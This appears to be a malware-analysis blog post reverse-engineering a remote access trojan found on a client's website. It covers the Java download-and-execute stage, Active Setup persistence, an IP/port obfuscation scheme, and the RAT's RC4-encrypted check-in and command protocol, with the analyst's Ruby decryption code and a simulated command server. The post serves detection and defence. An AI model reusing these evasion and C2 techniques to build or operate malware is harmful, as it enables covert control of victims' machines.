I've got a real treat for everyone today, as I received approval to blog about an interesting piece of malware I recently reversed as part of a client engagement. Obviously, due to the sensitive nature of this, I'll have to change some stuff to keep everything sanitized and anonymous, but it should still be pretty insightful (I hope) for everyone to see some of the malware we see here at SpiderLabs.
Due to the complexity of these samples, this might be a pretty long blog post. Sorry in advance for that, but hopefully it will be jam-packed with goodness. I'll try to keep everything broken up nicely to make it easier on the readers.
The Backstory
So let's say that we have a client named "Nate's Banana Stand". That's a bit long, so let's call it NBS for short. Anyway, NBS has a pretty nifty website in case anyone wants to order bananas online, or just view awesome banana facts. Things were going really well, until one day they noticed that a weird piece of Java code had somehow made its way onto their site. Obviously something was wrong, and that's where our wonderful journey starts.
The Entry Point
I love it when malware authors write code in Java. Why? Because you can almost always reliably decompile it back to nice, readable code. So let's go ahead and do that and see what we have. As you can see below, this code is pretty simple overall. It's effectively taking two parameters (X and Y), storing them in variables, and then evaluating (that is, executing) an overly long string of code. This eval'ed string obviously contains the bulk of the code, so we'll want to dig into that further.
Now let's take a look at that long string. Using the power of hitting the Enter key a few times at key places, we can get a better view of exactly what is going on here. I've included some comments in the code for clarity, but just in case you can't read it, I'll try to give a decent summary of what is going on.
So remember those X and Y parameters we snagged earlier? It looks like we're going to end up using them here. One of the first actions this code performs is grabbing the temporary directory of the system it is running on (the victim's). It then takes this directory and throws it into the 'tmp' variable. Then we see the Java code take the 'Name' parameter (previously Y) and append it to the tmp variable. So if we ran this on a Windows machine and the Y parameter equaled "file", we would see this tmp variable store something similar to "C:\Windows\Temp\file".
We then see the Java code make an outbound connection to the 'Url' parameter (previously X). It downloads a file from this URL and saves it to the path stored in the tmp variable defined above. Lastly, we see it execute this downloaded file.
So what is this Java code? Essentially, it's what is referred to as a 'Download and Execute' piece of code. Now it's a matter of seeing what is happening in this file.
The Payload
So we've got this executable file (always good times), which clearly appears to have something embedded inside of it as a resource file. A screenshot of this can be seen below. I'm using CFF Explorer to view the embedded resource files for those interested (http://www.ntcore.com/exsuite.php).
So it's got a resource file. Cool. But how's it getting used? Well, let's fire up IDA Pro and see if we can get a better grasp of what is happening. The first thing we notice is the main function that gets called. It uses a high number of variables, which can be a sign of something funny going on. We'll find out why in just a minute, I promise.
As we look further into the code we can see that each variable is being set to a hex value. Do you see anything of interest here?
How about now?
That's right, it appears that the malware authors are building strings by assigning each character to an individual variable. This helps hide some of the malware's functionality from more simplistic methods of analysis, such as viewing the strings in the file. We see this technique used throughout the rest of the analysis. Not a big problem, more of a nuisance than anything.
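Undoing this by hand is mostly bookkeeping: copy the byte values out of the disassembly in the order the variables are laid out, then read them back as ASCII. A minimal Ruby sketch of that step follows; the method name is my own, and the byte values are a hypothetical example (they spell "wininet.dll"), not values copied from this sample.

```ruby
# Rebuild a "stack string" from the individual byte values the malware
# assigns one variable at a time. The example bytes below are hypothetical.
def rebuild_stack_string(bytes)
  # Stop at the first NUL terminator, if the author included one.
  bytes.take_while { |b| b != 0x00 }.pack("C*")
end

example = [0x77, 0x69, 0x6E, 0x69, 0x6E, 0x65, 0x74, 0x2E, 0x64, 0x6C, 0x6C, 0x00]
puts rebuild_stack_string(example)
```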
OK, so once we de-obfuscate the strings we can paint a pretty good picture of what this malware is doing. In a nutshell, it's doing the following:
A) Dumps the embedded resource file to a file in the Windows temporary directory (the resource is, in fact, an executable).
B) Writes to the following registry keys:
C) Runs the dumped executable.
D) Deletes itself.
You might be wondering what those registry key writes are all about. Well, essentially these attackers are taking advantage of some old Windows functionality that dates back to Internet Explorer 4. By setting these registry values, the attackers are ensuring that the value set in the 'StubPath' entry gets executed when any user logs in. For more information, check out http://wpkg.org/Adding_Registry_Settings#Active_Setup and http://en.wikipedia.org/wiki/Active_Setup
OK, so where does that leave us? Well, guess what? This malware is essentially a dropper as well, which brings us to the (hopefully) last piece of the puzzle.
The Payload's... Payload
Alright, so we originally had some Java code, which downloaded an executable, which dropped a second executable. And here we are. Malware is fun, isn't it?
So, the first thing we notice about this sample is that it uses the same method of string obfuscation (OK, so it's not really obfuscation per se, but it's still annoying) all over the place. What a bunch of jerks. Once we start figuring out what the strings really mean, we can see two domains being set. Again, to keep things somewhat anonymous, let's call them "hate.bananas.net" and "reallyhate.bananas.net". We also see a function whose sole purpose is to load the wininet.dll library and get the addresses of a number of functions in this library.
Pretty sneaky, since using this method, we won't see the library or functions in the imports table when performing static analysis. Using these two pieces of information, we can take a guess and say this will most likely be making outbound calls to the hate.bananas.net and reallyhate.bananas.net domains (further inspection confirms this guess). So let's start using some dynamic analysis (in a contained sandbox) to get a better view of what sort of outbound connections this sample is making.
So just to be extra careful, I'm going to use a really nice little utility developed by Mandiant called ApateDNS (you can grab it for free at http://www.mandiant.com/products/free_software/mandiant_apatedns/). ApateDNS answers every DNS request made on the system with a single IP address of your choosing. So if I set it to 10.20.30.40, every application will be told that whatever domain it looks up resolves to 10.20.30.40. We should expect to see the malware making requests to this IP upon execution.
So we start running it, and we see that our DNS requests are being answered as expected:
*** Please note that my reference to 245.20.180.215 below is simply the result of converting the original IP address of 10.20.30.40, which you will see in a minute. This external IP address had nothing to do with the RAT, so don't think that whatever company that owns this IP is involved with malicious activities. ***
However, once we look at the network traffic in Wireshark, we start seeing requests to 245.20.180.215. What gives!? Well, when we look further into the malware, we can see that it is actually taking the IP address that it receives and 'mangling' it to discover the true IP that it wants to talk with. Closer inspection also reveals that it is using that IP address to discover the port as well. Personally, this is the first time I've seen malware do this, which makes me ecstatic if I'm being perfectly honest. It's always fun to encounter new challenges, since otherwise you're not learning.
Those who don't particularly care about the nitty-gritty details of how this malware obtains the real IP address and port, feel free to jump down to 'IP/Port Mangling Continued'. All you really need to know is that, using the method I'm about to describe, the malware ends up with a specific IP address and port that it will actually connect to.
IP/Port Mangling, Oh My!
Let's take an in-depth look at what it's doing, using 10.20.30.40 as an example.
The first thing the malware does is break the IP address up into its individual octets. Converted to hex, 10.20.30.40 looks like 0A.14.1E.28. Each octet is handled separately; taking the first one, the malware XORs it with 0x55, like so:
0x0A ^ 0x55 = 0x5F
The malware then strips off the rightmost hex digit (equivalent to shifting right by 4 bits), leaving us with 0x05. It saves this for later use. The next step in this obfuscation process is performing a binary AND between the previous 0x5F value and 0x0F (15 in decimal), and appending a "0" to the result (equivalent to shifting left by 4 bits). This ends up looking like the following:
(0x5F & 0x0F) = 0x0F
0x0F + "0" = 0xF0
Finally, the malware takes the 0xF0 value and adds it to the previous value of 0x05, like so:
0xF0 + 0x05 = 0xF5 (245 in decimal)
After the same steps are applied to the other three octets, the IP gets re-assembled, leaving us with:
F5.14.B4.D7 or 245.20.180.215
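Put together, the per-octet transformation boils down to "XOR with 0x55, then swap the two hex digits". Here's a minimal Ruby sketch reproducing it. The method names are my own, and this is a re-implementation of the behavior described above, not code lifted from the sample.

```ruby
# XOR an octet with 0x55, then swap its two hex digits (nibbles).
def mangle_octet(octet)
  x    = octet ^ 0x55          # 0x0A ^ 0x55 = 0x5F
  high = x >> 4                # "strip off the rightmost digit"   -> 0x05
  low  = (x & 0x0F) << 4       # "AND with 0x0F, append a 0"       -> 0xF0
  low + high                   # 0xF0 + 0x05 = 0xF5
end

# Apply the octet transformation to every octet of a dotted-quad string.
def mangle_ip(ip)
  ip.split(".").map { |o| mangle_octet(Integer(o, 10)) }.join(".")
end

puts mangle_ip("10.20.30.40")
```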
As I mentioned previously, the port used in the connection is derived from the original IP address as well, but using a different method from the one used to convert the IP address. Let's continue using 10.20.30.40 as an example.
The first thing that happens is the IP address is converted to hex, and the dots separating the octets are removed. So, 10.20.30.40 becomes 0A.14.1E.28, which in turn becomes 0A141E28. Now we're going to take this value and strip off the second half, keeping only the first two octets:
0A141E28 => 0A14
This value is then subsequently split in half:
0A14 => 0A and 14
These two values will be used going forward, so let's assign them to variables to make things less confusing:
var1 = 0x0A
var2 = 0x14
The next step is to take var2 and add 0xFF to it, like so:
0x14 + 0xFF = 0x0113
We're then going to append two zeros to the end of it (equivalent to shifting left by 8 bits):
0x0113 => 0x011300
Now the malware takes this value and adds var1 to it:
0x011300 + 0x0A = 0x01130A
Finally, we take the rightmost 2 bytes and convert them to decimal:
0x01130A => 0x130A => 4874
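The same steps in Ruby, again as a hedged re-implementation with a method name of my own choosing. Note that the last two octets never come into play, and that adding 0xFF and then keeping only the low byte amounts to subtracting 1 from var2 (mod 256).

```ruby
# Derive the port from the first two octets of the IP the malware received.
def derive_port(ip)
  var1, var2 = ip.split(".").first(2).map { |o| Integer(o, 10) }
  value = ((var2 + 0xFF) << 8) + var1   # 0x0113 -> 0x011300 -> 0x01130A
  value & 0xFFFF                        # keep the rightmost two bytes
end

puts derive_port("10.20.30.40")
```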
IP/Port Mangling Continued
Using this process, if we were to use 10.20.30.40 as the original IP address, the malware would end up connecting to 245.20.180.215 on port 4874. Pretty tricky, eh? This technique provides a buffer, of sorts, between a domain and the IP address actually contacted. A network/security analyst watching the traffic will see hate.bananas.net resolve to 10.20.30.40; however, if that same analyst sees outbound connections to 245.20.180.215 on port 4874, they might not realize the two are related, or that hate.bananas.net is in fact a malicious domain.
One small point of interest about the algorithm used above: if you use 245.20.180.215 as the original IP, it will actually spit out 10.20.30.40 on the other end (the octet transformation is its own inverse). This knowledge is extremely helpful in setting up our testing environment, as it tells us exactly which IP address ApateDNS needs to return. That way, the malware will connect to the 'real' IP address of our choosing instead.
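Because the transformation is its own inverse, working out what ApateDNS should hand back is just a matter of running the desired destination through it. Here's a small sketch of that, with a hypothetical helper name and return format. Keep in mind that the port is derived from the DNS answer, not from the destination, so you don't get to pick it independently.

```ruby
# XOR with 0x55, then swap nibbles (same transformation as the malware's).
def mangle_octet(octet)
  x = octet ^ 0x55
  ((x & 0x0F) << 4) | (x >> 4)
end

def mangle_ip(ip)
  ip.split(".").map { |o| mangle_octet(Integer(o, 10)) }.join(".")
end

# Port comes from the first two octets of the *resolved* address.
def derive_port(ip)
  a, b = ip.split(".").first(2).map { |o| Integer(o, 10) }
  (((b + 0xFF) << 8) + a) & 0xFFFF
end

# Hypothetical lab helper: which address should ApateDNS return so the
# malware ends up talking to target_ip, and on which port?
def apatedns_answer_for(target_ip)
  dns_answer = mangle_ip(target_ip)
  { dns_answer: dns_answer, port: derive_port(dns_answer) }
end

p apatedns_answer_for("192.168.172.137")
```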
Before I proceed, I believe it is helpful for you to see my testing environment, just in case you're wondering where some of these IP addresses are coming from. I've included a network diagram below of how I have everything configured:
So, we now understand how this malware is making outbound connections. We also see that it makes these connections every 10 seconds or so. Looking at the network traffic, it also appears to be using HTTP: a POST request is made to /ym/Attachments?YY=ABCD, where ABCD is a randomly generated 4-character string. We can see this below:
POST /ym/Attachments?YY=OMBB HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1)
Host: 192.168.172.137:56921
Content-Length: 87
Connection: Keep-Alive
Cache-Control: no-cache

.yb.j[,.$.%E...n.p...&.o.H5...GV.].]5l4..WX.k......R..E..5.....B.'..#M...F.qj-G....Ue.

HTTP/1.1 200 OK
Server: INetSim HTTP Server
Connection: Close
Content-Length: 9
Content-Type: application/octet-stream
Date: Tue, 13 Mar 2012 18:32:24 GMT
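The check-in request line is distinctive enough to make a reasonable network signature. Here's a hedged Ruby sketch; the constant and method names are mine, and the assumption that the YY value is always four uppercase letters rests only on the two samples in this post (OMBB and LWUS).

```ruby
# Hypothetical signature for the check-in request line described above.
CHECKIN_REQUEST = /\APOST \/ym\/Attachments\?YY=[A-Z]{4} HTTP\/1\.[01]\z/

def dirty_rat_checkin?(request_line)
  CHECKIN_REQUEST.match?(request_line.strip)
end

puts dirty_rat_checkin?("POST /ym/Attachments?YY=OMBB HTTP/1.1")
puts dirty_rat_checkin?("GET /index.html HTTP/1.1")
```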
I'm using a nice utility called INetSim (http://www.inetsim.org/) to simulate a 'legitimate' HTTP server on a secondary VM. Using the above algorithm, I know that if I configure ApateDNS to resolve to 89.223.159.205, the malware will actually make a connection to 192.168.172.137 on port 56921. This information is included in my network diagram included above.
Decoding the POST Request
The next step is discovering what payload is carried in the above HTTP POST request. There is obviously some form of obfuscation/encryption in use, so let's roll up our sleeves and get to work. When it comes to reversing obfuscation/encryption, half of the battle seems to be finding the function(s) used to manipulate the data. Once we find them, we can start looking at the specifics of exactly what is happening. The easiest way to do this is to start at the point where the data is actually sent over the wire and work backwards. Eventually, we discover the specific function that appears to be 'generating' the data that gets sent.
When we dig into this function, one of the first things that jumps out to me is this string of 'yb\x13j['.
If we take a look back at the packet that got sent out previously, we can actually see this string (starting at the second byte of the POST body). I've included the hex of the POST data below to make things a bit easier to read:
000000E0  95 79 62 13 6a 5b 2c 86  24 8f 25 45 b0 ae ec 6e  .yb.j[,. $.%E...n
000000F0  95 70 14 e5 03 26 b4 6f  9d 48 35 c3 e1 8d 47 56  .p...&.o .H5...GV
00000100  13 5d 1b 5d 35 6c 34 ae  a5 57 58 97 6b 99 d8 13  .].]5l4. .WX.k...
00000110  84 1c 0f 52 b6 c9 0a 45  18 bc 35 fb 0b e8 84 e6  ...R...E ..5.....
00000120  42 1d 27 cc 81 23 4d 12  9c fe 46 b7 71 6a 2d 47  B.'..#M. ..F.qj-G
00000130  18 b8 a2 8d 55 65 ec                              ....Ue.
If we look at multiple requests, we see this value remains static. It's possible this is used as a key of some sort, but it's difficult to know at this point, so we'll leave it alone for the time being. This leads us to the next part of the function, which appears to contain the bulk of its functionality: a call to function1, followed by two calls to function2.
Let's dig into function1. After a bit of analysis, we're able to determine that this function's sole purpose is to generate 8 random bytes and append them to the 'yb\x13j[' string we saw earlier.
We can see this random string appended to the 'yb\x13j[' string below:
Comparing this against the outgoing data generated by the malware, we're able to confirm that it is what gets sent out on the wire. The initial byte, 0x95, appears to be static and never changes. This explains how the following portion of the capture shown earlier is generated:
000000E0  95 79 62 13 6a 5b 2c 86  24 8f 25 45 b0 ae        .yb.j[,. $.%E..
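A quick way to sanity-check this against captured traffic is to peel the first 14 bytes (1 static byte, 5 static bytes, and 8 random bytes) off the POST body. The sketch below does that; the constant and method names are hypothetical, and it only checks the static parts described above.

```ruby
# Static part of the key block seen in this sample: 0x95 followed by "yb\x13j[".
STATIC_PREFIX = ["95"].pack("H*") + "yb\x13j[".b
KEY_SIZE = 14   # 1 + 5 static bytes, plus 8 random bytes per request

def extract_key(body)
  key = body.byteslice(0, KEY_SIZE)
  unless key && key.bytesize == KEY_SIZE && key.start_with?(STATIC_PREFIX)
    raise ArgumentError, "unexpected key block"
  end
  key
end

body = ["957962136a5b2c86248f2545b0aeec6e"].pack("H*")
puts extract_key(body).unpack1("H*")
```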
So good news, we're making some progress. It's unlikely this outbound POST request is simply sending out garbage data. That being said, let's keep going to see if we can figure out what the rest of it is. Alright, so moving on to that function2...
So function2 takes 5 arguments. After some investigation, we learn that it takes two integers, two strings (or pointers to strings), and a buffer.
function2(StringPointer1, Integer1, Buffer1, StringPointer2, Integer2)
Further inspection reveals that the integers are in fact the size of their corresponding StringPointers. That is to say, these integers contain the size of the data these pointers reference. The Buffer1 variable also appears to be where the encrypted data is written. Using this knowledge, we can update function2 to the following:
function2(var1, size_of_var1, encrypted_data_buffer, var2, size_of_var2)
Looking even closer at function2, it appears that var1 is actually the unencrypted data, which helps us narrow down what var2 is. If I had to guess, I'd say var2 is the key being used for encryption, but only time will tell. So again, just to keep things tidy, let's clean up function2:
function2(unencrypted_data, unencrypted_data_size, encrypted_data_buffer, potential_key, potential_key_size)
So remember above when we saw function2 get called twice? Let's see what the actual arguments passed into it are. The first time function2 is called, the size of the unencrypted data is 2. The second time it's called, the size of the unencrypted data is 47. In fact, if we look at the unencrypted data in the second call to function2, we see some very interesting data indeed:
Specifically, this malware is grabbing the hostname, username, IP address, and Microsoft Windows version of the victim. So this appears to be the real information that is exfiltrated in the previously seen POST request. And what about the first call to function2, where it only writes 2 bytes? Well, it turns out that these two bytes hold the size of the data being sent. This value is obfuscated in the same way as the second block of data, which we'll be discussing in just a second. So at this point, we know the unencrypted data, we know the 'key' that's being used, and we know where the encrypted data is being written. Now it's just a matter of figuring out how this encryption process works, so we can go backwards and decrypt the data seen going across the network.
As before, if you don't feel like going into the finer details of how this obfuscation works, that's completely fine. Feel free to jump to "Reaping the Rewards".
De-obfuscating the Data
So, here we go...
The first thing we see this function block do is create an array containing the values 0 through 255 (0x00 through 0xFF). We can simulate this in Ruby:
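Something along these lines reproduces that starting table (a sketch; the variable name is mine), printed as a 16-by-16 grid similar to a debugger's memory view:

```ruby
# The initial 256-entry table: the values 0x00 through 0xFF in order.
s = (0..255).to_a

# Print it 16 bytes per row, as two-digit hex.
s.each_slice(16) { |row| puts row.map { |b| format("%02X", b) }.join(" ") }
```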
We will see this block of data get manipulated as we continue following the actions taken by this function. After the manipulation occurs we see the following block of data:
As we look further and stare at the code as it executes, we slowly discover that this malware is, in fact, using a popular form of encryption known as RC4. As this post is already far, far too long, I'm not going to go into the specifics of RC4's implementation. Instead, I'd like to refer you to http://en.wikipedia.org/wiki/RC4, which has a fair amount of information on the algorithm that is used.
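For reference, here's a textbook RC4 in Ruby. It's written from the standard description of the algorithm rather than transcribed from the malware's routine, so it assumes the sample doesn't tweak RC4 in any way. The key-scheduling loop is what produces the "manipulated" table described above.

```ruby
# Textbook RC4: key scheduling (KSA) followed by keystream generation (PRGA).
# Encryption and decryption are the same operation.
def rc4(key, data)
  k = key.bytes
  s = (0..255).to_a

  # KSA: shuffle the 0..255 table using the key bytes.
  j = 0
  256.times do |i|
    j = (j + s[i] + k[i % k.length]) % 256
    s[i], s[j] = s[j], s[i]
  end

  # PRGA: XOR each data byte with the next keystream byte.
  i = j = 0
  out = data.bytes.map do |byte|
    i = (i + 1) % 256
    j = (j + s[i]) % 256
    s[i], s[j] = s[j], s[i]
    byte ^ s[(s[i] + s[j]) % 256]
  end
  out.pack("C*")
end

puts rc4("Key", "Plaintext").unpack1("H*")
```

The published test vector for key "Key" and plaintext "Plaintext" is bbf316e8d940af0ad3, which is a handy check that an implementation like this behaves before pointing it at real traffic.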
Now that we know RC4 is being used, and have identified the key, we can begin to work towards decrypting the data seen on the wire.
Reaping the Rewards
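Using the information obtained above, I was able to create an encrypt/decrypt script. The nice thing about RC4 is that it is a symmetric stream cipher: encryption and decryption are the same operation (XORing the data with a keystream derived from the key). In other words, if we feed the encrypted data in as a parameter, the result is the raw data, and vice versa (as shown below).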
Decrypting data discovered in packet capture from above:
JGrunzweig - ~> ruby decrypt_dirty_rat.rb "957962136a5b2c86248f2545b0ae" "957014e50326b46f9d4835c3e18d4756135d1b5d356c34aea55758976b99d813841c0f52b6c90a4518bc35fb0be884e6421d27cc81234d129cfe46b7716a2d4718b8a28d5565ec"
Decrypted/Encrypted: TRUSTWAV-C8C316 | TRUSTWAV-C8C316 | Josh | 192.168.112.128 | 5.1??_O
HEX: 0f54525553545741562d43384333313620207c2054525553545741562d433843333136207c204a6f7368207c203139322e3136382e3131322e313238207c20352e3102b8925f4f
Encrypting data by supplying results of above as the data to encrypt:
JGrunzweig - ~> ruby decrypt_dirty_rat.rb "957962136a5b2c86248f2545b0ae" "0f54525553545741562d43384333313620207c2054525553545741562d433843333136207c204a6f7368207c203139322e3136382e3131322e313238207c20352e3102b8925f4f"
Decrypted/Encrypted: ?p?&?o?H5??GV]4??WX?k???R??
E?5?
??B'́#M??F?qj-G???Ue?
HEX: 957014e50326b46f9d4835c3e18d4756135d1b5d356c34aea55758976b99d813841c0f52b6c90a4518bc35fb0be884e6421d27cc81234d129cfe46b7716a2d4718b8a28d5565ec
As a recap, the following packet structure can be seen in this malware:
<KEY><Length (obfuscated)><Data (obfuscated)>
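Here's a sketch of a parser for that layout. The assumptions are mine, not confirmed against the disassembly: the key block is the first 14 bytes, the length field is the next 2 bytes, and the length and data blocks are each RC4-encrypted with a fresh RC4 state keyed by the full 14-byte key block. That matches the two separate function2 calls and the way the decrypt script above is invoked with only the key and the data. The method names are hypothetical.

```ruby
# Textbook RC4; encryption and decryption are the same operation.
def rc4(key, data)
  s = (0..255).to_a
  k = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + k[i % k.length]) % 256
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  out = data.bytes.map do |b|
    i = (i + 1) % 256
    j = (j + s[i]) % 256
    s[i], s[j] = s[j], s[i]
    b ^ s[(s[i] + s[j]) % 256]
  end
  out.pack("C*")
end

KEY_SIZE = 14
LENGTH_SIZE = 2

# Returns the key (hex), the decrypted length field (hex; byte order is
# unknown) and the decrypted data (raw bytes).
def parse_checkin(body)
  header = KEY_SIZE + LENGTH_SIZE
  raise ArgumentError, "body too short" if body.bytesize < header
  key = body.byteslice(0, KEY_SIZE)
  {
    key: key.unpack1("H*"),
    length_field: rc4(key, body.byteslice(KEY_SIZE, LENGTH_SIZE)).unpack1("H*"),
    data: rc4(key, body.byteslice(header, body.bytesize - header))
  }
end

# The 87-byte POST body from the capture earlier in this post.
capture = ["957962136a5b2c86248f2545b0aeec6e" \
           "957014e50326b46f9d4835c3e18d4756135d1b5d356c34aea55758976b99d813" \
           "841c0f52b6c90a4518bc35fb0be884e6421d27cc81234d129cfe46b7716a2d47" \
           "18b8a28d5565ec"].pack("H*")
parsed = parse_checkin(capture)
puts parsed[:key]
puts parsed[:data].unpack1("H*")
```

If those assumptions hold, the data field should decrypt to the same bytes as the HEX output of the decrypt script shown above.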
At this point we've cracked the obfuscation in use by this malware, which is awesome because we can now see the actual data being sent under the hood so to speak. But there's got to be more to it than just sending out a string of "recon" data. Let's dig further. I have a feeling this sample has more 'goodies' inside.
Digging further, it appears as though the malware is expecting a response from the remote server. The following screenshot provides a clue as to what the malware is expecting to see:
As you can see, it appears as though the malware is expecting one of several pre-set commands. This is common remote access trojan (RAT) functionality, which provides some insight as to why I named this little guy 'Dirty RAT'.
At this point in the analysis, I've been able to use the knowledge that I've gained to write a quick little server-side script in Ruby that will allow me to accept input and execute commands. An example of the script's output can be seen below:
jgrunzweig@malware:~$ ruby server.rb
[2012-03-19 10:39:44] INFO WEBrick 1.3.1
[2012-03-19 10:39:44] INFO ruby 1.9.2 (2011-07-09) [i686-linux]
[2012-03-19 10:39:44] WARN TCPServer Error: Address already in use - bind(2)
[2012-03-19 10:39:44] INFO WEBrick::HTTPServer#start: pid=24229 port=56921
192.168.172.1 - - [19/Mar/2012:10:40:34 PDT] "POST /ym/Attachments?YY=LWUS HTTP/1.1" 200 41
[*] Connection Received: 192.168.172.138
[*] Data Received: 957962136a5bc02f56682dd0d03abe0d6cabe56d5db62227654e25b86adcd3a69457249e7fbb0b2beeaf2424e32d61706dd3572a2bfb1a012aafd98a4de178660cfcd7bb78e7b81dcd68a3331b148db516ad180feeee61
[*] Data Decrypted: TRUSTWAV-C8C316 | TRUSTWAV-C8C316 | Josh | 192.168.112.128 | 5.1�ogO
- -> /ym/Attachments?YY=LWUS
[*] Connection Received: 192.168.172.138
[*] Sending command of '/DISK' to 192.168.172.138
[*] Data Received: 957962136a5b6b1f9a8a44767c921396a587422e8a82e994bb26bd88b0bb0769cb3770994de5789db719f37b9a2856eccecd8027c10b3b2f20a4d0bb7fe5d39d17a10146f191f5343b0fa5e4b77f659878a5a69540e5c357742553c53b506dc31f0fb97206b01c02b95272ddf4fd0118eb4c601203abcf00c4b1c321dfdd511988dedcc9de4ca6069dd74d6fb6075d
[*] Data Decrypted: TRUSTWAV-C8C316Drive | Type
A: | REMOVEDISK
C: | LOCALDISK
D: | CDROM
Z: | REMOTEDISK
TRUSTWAV-C8C316#�ogO
jgrunzweig@malware:~$
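Once responses decrypt cleanly, it's easy to turn them into something structured. Here's a hedged sketch for the '/DISK' response, assuming the "X: | TYPE" line format seen in the output above; the method name is hypothetical, and the hostname and trailing bytes around the table are simply ignored.

```ruby
# Pull drive-letter/type pairs out of a decrypted '/DISK' response.
def parse_disk_listing(text)
  text.scan(/^([A-Z]:)\s*\|\s*([A-Z]+)\s*$/).to_h
end

response = "TRUSTWAV-C8C316Drive | Type\nA: | REMOVEDISK\nC: | LOCALDISK\n" \
           "D: | CDROM\nZ: | REMOTEDISK\nTRUSTWAV-C8C316"
p parse_disk_listing(response)
```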
On the wire, it ends up looking something like this:
Conclusions
RATs are nothing new to the malware world; they've been around for quite some time. In fact, as I am writing this post, a new version of the popular RAT 'DarkComet' was recently released (http://resources.infosecinstitute.com/darkcomet-analysis-syria/). While many people understand the concept of RATs, many don't understand their internal workings, or the complexity the authors have built into them. It would be quite impressive (in my book, at least) for a network administrator to identify A) that the hate.bananas.net and reallyhate.bananas.net domains are, in fact, being used by this RAT, and B) what data is being sent across the network. Even if they realize that this traffic is malicious, they may never understand the true nature of what is going on.
In the end, we don't really know what motivated the attackers to target Nate's Banana Stand. It's possible their website contained a public, known vulnerability that the attackers were scanning for. It's also certainly possible that this was a targeted attack aimed at obtaining both credit cards and private banana facts in tandem, as both of these commodities are considered quite valuable on the black market. Whatever the reason, I like to believe that the attackers targeted this client because they knew that "there's always money in the banana stand".